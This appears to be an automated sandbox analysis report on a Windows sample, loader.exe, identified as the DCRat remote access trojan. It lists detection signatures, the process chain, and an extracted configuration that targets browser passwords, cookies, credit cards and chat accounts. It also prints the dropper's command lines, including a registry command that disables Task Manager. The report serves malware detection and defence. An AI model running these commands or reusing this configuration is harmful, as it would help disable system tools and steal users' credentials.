Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
loader.exe

Overview

General Information

Sample name:loader.exe
Analysis ID:1542823
MD5:f462fd11ceda48487db07c5b70410dac
SHA1:48010b409ab20a6a51e562d347b87abcb15dd9fe
SHA256:4139522809118bba10441242323550ef8f00264e862a5403dab48c1c5c8ad654
Tags:exeuser-aachum
Infos:

Detection

DCRat
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected DCRat
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Check if machine is in data center or colocation facility
Disable Task Manager(disabletaskmgr)
Disables the Windows task manager (taskmgr)
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Yara signature match

Classification

Process Tree

  • System is w10x64
  • loader.exe (PID: 6432 cmdline: "C:\Users\user\Desktop\loader.exe" MD5: F462FD11CEDA48487DB07C5B70410DAC)
    • wscript.exe (PID: 6552 cmdline: "C:\Windows\System32\WScript.exe" "C:\blockcomwinsavescrt\DKYQpYxB0fjo0It.vbe" MD5: FF00E0480075B095948000BDC66E81F0)
      • cmd.exe (PID: 6916 cmdline: C:\Windows\system32\cmd.exe /c ""C:\blockcomwinsavescrt\jwlZX38GInff6rIBqWRHehXwajI.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 6960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • containercomponentSaves.exe (PID: 7008 cmdline: "C:\blockcomwinsavescrt\containercomponentSaves.exe" MD5: 59E330F176AE037DCC65EFC5F7D7859A)
        • reg.exe (PID: 3720 cmdline: reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
DCRatDCRat is a typical RAT that has been around since at least June 2019.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat

Malware Configuration

Threatname: DCRat

{"SCRT": "{\"1\":\">\",\"v\":\".\",\"J\":\"|\",\"I\":\"$\",\"h\":\"^\",\"k\":\"%\",\"j\":\"<\",\"m\":\"(\",\"9\":\"_\",\"0\":\"#\",\"S\":\" \",\"o\":\"-\",\"c\":\";\",\"3\":\"*\",\"N\":\"~\",\"i\":\"&\",\"w\":\")\",\"M\":\",\",\"l\":\"@\",\"O\":\"!\",\"R\":\"`\"}", "PCRT": "{\"R\":\"(\",\"0\":\";\",\"J\":\"-\",\"B\":\"!\",\"V\":\"|\",\"Y\":\"&\",\"H\":\">\",\"m\":\"_\",\"d\":\",\",\"T\":\" \",\"r\":\"~\",\"x\":\"<\",\"Q\":\".\",\"l\":\"$\",\"1\":\")\",\"h\":\"*\",\"p\":\"@\",\"n\":\"#\",\"U\":\"^\",\"3\":\"`\",\"C\":\"%\"}", "TAG": "", "MUTEX": "DCR_MUTEX-9cBVMnkcjsA8jrBBUcH3", "LDTM": false, "DBG": false, "SST": 5, "SMST": 2, "BCS": 2, "AUR": 1, "ASCFG": {"savebrowsersdatatosinglefile": false, "ignorepartiallyemptydata": false, "cookies": true, "passwords": true, "forms": true, "cc": true, "history": true, "telegram": true, "steam": true, "discord": true, "filezilla": true, "screenshot": true, "clipboard": true, "sysinfo": true, "searchpath": "%SystemDrive% - Slow"}, "AS": true, "ASO": false, "AD": false}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000002.1832418118.0000000013067000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
    00000004.00000002.1832051997.0000000002F11000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
      Process Memory Space: containercomponentSaves.exe PID: 7008JoeSecurity_DCRat_1Yara detected DCRatJoe Security

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        4.2.containercomponentSaves.exe.2f62ec8.1.raw.unpackINDICATOR_SUSPICIOUS_References_SecTools_B64EncodedDetects executables referencing many base64-encoded IR and analysis tools namesditekSHen
        • 0x164ec:$s4: cHJvY2V4cA
        • 0x16e34:$s4: cHJvY2V4cA
        • 0x1652d:$s5: cHJvY2V4cDY0
        • 0x16e75:$s5: cHJvY2V4cDY0
        • 0x16429:$s12: d2lyZXNoYXJr
        • 0x16d71:$s12: d2lyZXNoYXJr
        • 0x162d2:$s23: ZG5zcHk
        • 0x16c1a:$s23: ZG5zcHk
        • 0x162db:$s25: aWxzcHk
        • 0x16c23:$s25: aWxzcHk
        • 0x162e4:$s26: ZG90cGVla
        • 0x16c2c:$s26: ZG90cGVla

        Sigma Signatures

        System Summary

        barindex
        Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
        Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\blockcomwinsavescrt\DKYQpYxB0fjo0It.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\blockcomwinsavescrt\DKYQpYxB0fjo0It.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\loader.exe", ParentImage: C:\Users\user\Desktop\loader.exe, ParentProcessId: 6432, ParentProcessName: loader.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\blockcomwinsavescrt\DKYQpYxB0fjo0It.vbe" , ProcessId: 6552, ProcessName: wscript.exe

        Suricata Signatures

        No Suricata rule has matched

        Joe Sandbox Signatures

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Antivirus / Scanner detection for submitted sample
        Source: loader.exeAvira: detected
        Antivirus detection for dropped file
        Source: C:\blockcomwinsavescrt\containercomponentSaves.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
        Source: C:\blockcomwinsavescrt\DKYQpYxB0fjo0It.vbeAvira: detection malicious, Label: VBS/Runner.VPG
        Found malware configuration
        Source: 00000004.00000002.1832418118.0000000013067000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: DCRat {"SCRT": "{\"1\":\">\",\"v\":\".\",\"J\":\"|\",\"I\":\"$\",\"h\":\"^\",\"k\":\"%\",\"j\":\"<\",\"m\":\"(\",\"9\":\"_\",\"0\":\"#\",\"S\":\" \",\"o\":\"-\",\"c\":\";\",\"3\":\"*\",\"N\":\"~\",\"i\":\"&\",\"w\":\")\",\"M\":\",\",\"l\":\"@\",\"O\":\"!\",\"R\":\"`\"}", "PCRT": "{\"R\":\"(\",\"0\":\";\",\"J\":\"-\",\"B\":\"!\",\"V\":\"|\",\"Y\":\"&\",\"H\":\">\",\"m\":\"_\",\"d\":\",\",\"T\":\" \",\"r\":\"~\",\"x\":\"<\",\"Q\":\".\",\"l\":\"$\",\"1\":\")\",\"h\":\"*\",\"p\":\"@\",\"n\":\"#\",\"U\":\"^\",\"3\":\"`\",\"C\":\"%\"}", "TAG": "", "MUTEX": "DCR_MUTEX-9cBVMnkcjsA8jrBBUcH3", "LDTM": false, "DBG": false, "SST": 5, "SMST": 2, "BCS": 2, "AUR": 1, "ASCFG": {"savebrowsersdatatosinglefile": false, "ignorepartiallyemptydata": false, "cookies": true, "passwords": true, "forms": true, "cc": true, "history": true, "telegram": true, "steam": true, "discord": true, "filezilla": true, "screenshot": true, "clipboard": true, "sysinfo": true, "searchpath": "%SystemDrive% - Slow"}, "AS": true, "ASO": false, "AD": false}
        Multi AV Scanner detection for dropped file
        Source: C:\blockcomwinsavescrt\containercomponentSaves.exeReversingLabs: Detection: 84%
        Multi AV Scanner detection for submitted file
        Source: loader.exeReversingLabs: Detection: 70%
        AI detected suspicious sample
        Source: Submited SampleIntegrated Neural Analysis Model: Matched 98.8% probability
        Machine Learning detection for dropped file
        Source: C:\blockcomwinsavescrt\containercomponentSaves.exeJoe Sandbox ML: detected
        Machine Learning detection for sample
        Source: loader.exeJoe Sandbox ML: detected
        Source: loader.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
        Source: loader.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
        Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: loader.exe
        Source: C:\Users\user\Desktop\loader.exeCode function: 0_2_0010A5F4 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_0010A5F4
        Source: C:\Users\user\Desktop\loader.exeCode function: 0_2_0011B8E0 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_0011B8E0
        Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
        Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
        Source: Joe Sandbox ViewASN Name: TUT-ASUS TUT-ASUS
        Source: unknownDNS query: name: ip-api.com
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
        Source: global trafficDNS traffic detected: DNS query: ip-api.com
        Source: containercomponentSaves.exe, 00000004.00000002.1832051997.00000000030B8000.00000004.00000800.00020000.00000000.sdmp, containercomponentSaves.exe, 00000004.00000002.1832051997.00000000030AE000.00000004.00000800.00020000.00000000.sdmp, containercomponentSaves.exe, 00000004.00000002.1832051997.00000000030BE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com
        Source: containercomponentSaves.exe, 00000004.00000002.1832051997.0000000002F81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hosting
        Source: containercomponentSaves.exe, 00000004.00000002.1832051997.00000000030AE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name

        System Summary

        barindex
        Malicious sample detected (through community Yara rule)
        Source: 4.2.containercomponentSaves.exe.2f62ec8.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing many base64-encoded IR and analysis tools names Author: ditekSHen
        Windows Scripting host queries suspicious COM object (likely to drop second stage)
        Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
        Source: C:\Users\user\Desktop\loader.exeCode function: 0_2_0010718C: __EH_prolog,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,0_2_0010718C
        Source: C:\Users\user\Desktop\loader.exeCode function: 0_2_0010857B0_2_0010857B
        Source: C:\Users\user\Desktop\loader.exeCode function: 0_2_0012D00E0_2_0012D00E
        Source: C:\Users\user\Desktop\loader.exeCode function: 0_2_0010407E0_2_0010407E
        Source: C:\Users\user\Desktop\loader.exeCode function: 0_2_001170BF0_2_001170BF
        Source: C:\Users\user\Desktop\loader.exeCode function: 0_2_001311940_2_00131194
        Source: C:\Users\user\Desktop\loader.exeCode function: 0_2_001032810_2_00103281
        Source: C:\Users\user\Desktop\loader.exeCode function: 0_2_0010E2A00_2_0010E2A0
        Source: C:\Users\user\Desktop\loader.exeCode function: 0_2_001202F60_2_001202F6
        Source: C:\Users\user\Desktop\loader.exeCode function: 0_2_001166460_2_00116646
        Source: C:\Users\user\Desktop\loader.exeCode function: 0_2_0012070E0_2_0012070E
        Source: C:\Users\user\Desktop\loader.exeCode function: 0_2_0012473A0_2_0012473A
        Source: C:\Users\user\Desktop\loader.exeCode function: 0_2_001137C10_2_001137C1
        Source: C:\Users\user\Desktop\loader.exeCode function: 0_2_001027E80_2_001027E8
        Source: C:\Users\user\Desktop\loader.exeCode function: 0_2_0010E8A00_2_0010E8A0
        Source: C:\Users\user\Desktop\loader.exeCode function: 0_2_0010F9680_2_0010F968
        Source: C:\Users\user\Desktop\loader.exeCode function: 0_2_001249690_2_00124969
        Source: C:\Users\user\Desktop\loader.exeCode function: 0_2_00113A3C0_2_00113A3C
        Source: C:\Users\user\Desktop\loader.exeCode function: 0_2_00116A7B0_2_00116A7B
        Source: C:\Users\user\Desktop\loader.exeCode function: 0_2_00120B430_2_00120B43
        Source: C:\Users\user\Desktop\loader.exeCode function: 0_2_0012CB600_2_0012CB60
        Source: C:\Users\user\Desktop\loader.exeCode function: 0_2_00115C770_2_00115C77
        Source: C:\Users\user\Desktop\loader.exeCode function: 0_2_0010ED140_2_0010ED14
        Source: C:\Users\user\Desktop\loader.exeCode function: 0_2_00113D6D0_2_00113D6D
        Source: C:\Users\user\Desktop\loader.exeCode function: 0_2_0011FDFA0_2_0011FDFA
        Source: C:\Users\user\Desktop\loader.exeCode function: 0_2_0010BE130_2_0010BE13
        Source: C:\Users\user\Desktop\loader.exeCode function: 0_2_0010DE6C0_2_0010DE6C
        Source: C:\Users\user\Desktop\loader.exeCode function: 0_2_00105F3C0_2_00105F3C
        Source: C:\Users\user\Desktop\loader.exeCode function: 0_2_00120F780_2_00120F78
        Source: C:\blockcomwinsavescrt\containercomponentSaves.exeCode function: 4_2_00007FFD9B9E35954_2_00007FFD9B9E3595
        Source: C:\blockcomwinsavescrt\containercomponentSaves.exeCode function: 4_2_00007FFD9B9ECD484_2_00007FFD9B9ECD48
        Source: C:\blockcomwinsavescrt\containercomponentSaves.exeCode function: 4_2_00007FFD9B9ECD094_2_00007FFD9B9ECD09
        Source: C:\Users\user\Desktop\loader.exeCode function: String function: 0011ED00 appears 31 times
        Source: C:\Users\user\Desktop\loader.exeCode function: String function: 0011E360 appears 52 times
        Source: C:\Users\user\Desktop\loader.exeCode function: String function: 0011E28C appears 35 times
        Source: containercomponentSaves.exe.0.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
        Source: loader.exe, 00000000.00000002.1710718170.0000000002F46000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamewscript.exe.mui` vs loader.exe
        Source: loader.exe, 00000000.00000002.1710718170.0000000002F46000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamewscript.exe` vs loader.exe
        Source: loader.exe, 00000000.00000003.1709378737.0000000002F46000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamewscript.exe.mui` vs loader.exe
        Source: loader.exe, 00000000.00000003.1709378737.0000000002F46000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamewscript.exe` vs loader.exe
        Source: loader.exe, 00000000.00000003.1706248768.00000000052C7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelibGLESv2.dll4 vs loader.exe
        Source: loader.exe, 00000000.00000003.1707087184.0000000005247000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelibGLESv2.dll4 vs loader.exe
        Source: loader.exeBinary or memory string: OriginalFilenamelibGLESv2.dll4 vs loader.exe
        Source: loader.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
        Source: 4.2.containercomponentSaves.exe.2f62ec8.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_References_SecTools_B64Encoded author = ditekSHen, description = Detects executables referencing many base64-encoded IR and analysis tools names
        Source: containercomponentSaves.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: 0.3.loader.exe.6988fc4.0.raw.unpack, e12nGA4j2K57ImO696x.csCryptographic APIs: 'CreateDecryptor'
        Source: 0.3.loader.exe.6988fc4.0.raw.unpack, e12nGA4j2K57ImO696x.csCryptographic APIs: 'CreateDecryptor'
        Source: 0.3.loader.exe.6988fc4.0.raw.unpack, r7ARBUU6KQplkvN1o3h.csCryptographic APIs: 'TransformBlock'
        Source: 0.3.loader.exe.6988fc4.0.raw.unpack, r7ARBUU6KQplkvN1o3h.csCryptographic APIs: 'TransformFinalBlock'
        Source: 0.3.loader.exe.52cbfc4.1.raw.unpack, e12nGA4j2K57ImO696x.csCryptographic APIs: 'CreateDecryptor'
        Source: 0.3.loader.exe.52cbfc4.1.raw.unpack, e12nGA4j2K57ImO696x.csCryptographic APIs: 'CreateDecryptor'
        Source: 0.3.loader.exe.52cbfc4.1.raw.unpack, r7ARBUU6KQplkvN1o3h.csCryptographic APIs: 'TransformBlock'
        Source: 0.3.loader.exe.52cbfc4.1.raw.unpack, r7ARBUU6KQplkvN1o3h.csCryptographic APIs: 'TransformFinalBlock'
        Source: 4.2.containercomponentSaves.exe.2f62ec8.1.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
        Source: 4.2.containercomponentSaves.exe.1b840000.2.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
        Source: 0.3.loader.exe.52cbfc4.1.raw.unpack, XRvakYPisYbwnI0BclJ.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
        Source: 0.3.loader.exe.52cbfc4.1.raw.unpack, XRvakYPisYbwnI0BclJ.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
        Source: 0.3.loader.exe.6988fc4.0.raw.unpack, XRvakYPisYbwnI0BclJ.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
        Source: 0.3.loader.exe.6988fc4.0.raw.unpack, XRvakYPisYbwnI0BclJ.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
        Source: classification engineClassification label: mal100.troj.evad.winEXE@11/4@1/1
        Source: C:\Users\user\Desktop\loader.exeCode function: 0_2_00106EC9 GetLastError,FormatMessageW,0_2_00106EC9
        Source: C:\Users\user\Desktop\loader.exeCode function: 0_2_00119E1C FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,0_2_00119E1C
        Source: C:\blockcomwinsavescrt\containercomponentSaves.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\containercomponentSaves.exe.logJump to behavior
        Source: C:\blockcomwinsavescrt\containercomponentSaves.exeMutant created: NULL
        Source: C:\blockcomwinsavescrt\containercomponentSaves.exeMutant created: \Sessions\1\BaseNamedObjects\Local\e775887669f4fbb7226aa280db726666d333fd67
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6960:120:WilError_03
        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\blockcomwinsavescrt\jwlZX38GInff6rIBqWRHehXwajI.bat" "
        Source: C:\Users\user\Desktop\loader.exeCommand line argument: sfxname0_2_0011D5D4
        Source: C:\Users\user\Desktop\loader.exeCommand line argument: sfxstime0_2_0011D5D4
        Source: C:\Users\user\Desktop\loader.exeCommand line argument: STARTDLG0_2_0011D5D4
        Source: loader.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: loader.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
        Source: C:\Users\user\Desktop\loader.exeFile read: C:\Windows\win.iniJump to behavior
        Source: C:\Users\user\Desktop\loader.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: loader.exeReversingLabs: Detection: 70%
        Source: C:\Users\user\Desktop\loader.exeFile read: C:\Users\user\Desktop\loader.exeJump to behavior
        Source: unknownProcess created: C:\Users\user\Desktop\loader.exe "C:\Users\user\Desktop\loader.exe"
        Source: C:\Users\user\Desktop\loader.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\blockcomwinsavescrt\DKYQpYxB0fjo0It.vbe"
        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\blockcomwinsavescrt\jwlZX38GInff6rIBqWRHehXwajI.bat" "
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\blockcomwinsavescrt\containercomponentSaves.exe "C:\blockcomwinsavescrt\containercomponentSaves.exe"
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
        Source: C:\Users\user\Desktop\loader.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\blockcomwinsavescrt\DKYQpYxB0fjo0It.vbe" Jump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\blockcomwinsavescrt\jwlZX38GInff6rIBqWRHehXwajI.bat" "Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\blockcomwinsavescrt\containercomponentSaves.exe "C:\blockcomwinsavescrt\containercomponentSaves.exe" Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /fJump to behavior
        Source: C:\Users\user\Desktop\loader.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
        Source: C:\Users\user\Desktop\loader.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
        Source: C:\Users\user\Desktop\loader.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
        Source: C:\Users\user\Desktop\loader.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
        Source: C:\Users\user\Desktop\loader.exeSection loaded: <pi-ms-win-core-localization-l1-2-1.dllJump to behavior
        Source: C:\Users\user\Desktop\loader.exeSection loaded: version.dllJump to behavior
        Source: C:\Users\user\Desktop\loader.exeSection loaded: dxgidebug.dllJump to behavior
        Source: C:\Users\user\Desktop\loader.exeSection loaded: sfc_os.dllJump to behavior
        Source: C:\Users\user\Desktop\loader.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\Desktop\loader.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Users\user\Desktop\loader.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\Desktop\loader.exeSection loaded: dwmapi.dllJump to behavior
        Source: C:\Users\user\Desktop\loader.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\Desktop\loader.exeSection loaded: riched20.dllJump to behavior
        Source: C:\Users\user\Desktop\loader.exeSection loaded: usp10.dllJump to behavior
        Source: C:\Users\user\Desktop\loader.exeSection loaded: msls31.dllJump to behavior
        Source: C:\Users\user\Desktop\loader.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\Desktop\loader.exeSection loaded: windowscodecs.dllJump to behavior
        Source: C:\Users\user\Desktop\loader.exeSection loaded: textshaping.dllJump to behavior
        Source: C:\Users\user\Desktop\loader.exeSection loaded: textinputframework.dllJump to behavior
        Source: C:\Users\user\Desktop\loader.exeSection loaded: coreuicomponents.dllJump to behavior
        Source: C:\Users\user\Desktop\loader.exeSection loaded: coremessaging.dllJump to behavior
        Source: C:\Users\user\Desktop\loader.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Users\user\Desktop\loader.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\loader.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\loader.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\loader.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\Desktop\loader.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\Desktop\loader.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Users\user\Desktop\loader.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\Desktop\loader.exeSection loaded: edputil.dllJump to behavior
        Source: C:\Users\user\Desktop\loader.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Users\user\Desktop\loader.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Users\user\Desktop\loader.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Users\user\Desktop\loader.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Users\user\Desktop\loader.exeSection loaded: windows.staterepositoryps.dllJump to behavior
        Source: C:\Users\user\Desktop\loader.exeSection loaded: policymanager.dllJump to behavior
        Source: C:\Users\user\Desktop\loader.exeSection loaded: msvcp110_win.dllJump to behavior
        Source: C:\Users\user\Desktop\loader.exeSection loaded: appresolver.dllJump to behavior
        Source: C:\Users\user\Desktop\loader.exeSection loaded: bcp47langs.dllJump to behavior
        Source: C:\Users\user\Desktop\loader.exeSection loaded: slc.dllJump to behavior
        Source: C:\Users\user\Desktop\loader.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Users\user\Desktop\loader.exeSection loaded: sppc.dllJump to behavior
        Source: C:\Users\user\Desktop\loader.exeSection loaded: onecorecommonproxystub.dllJump to behavior
        Source: C:\Users\user\Desktop\loader.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
        Source: C:\Users\user\Desktop\loader.exeSection loaded: pcacli.dllJump to behavior
        Source: C:\Users\user\Desktop\loader.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
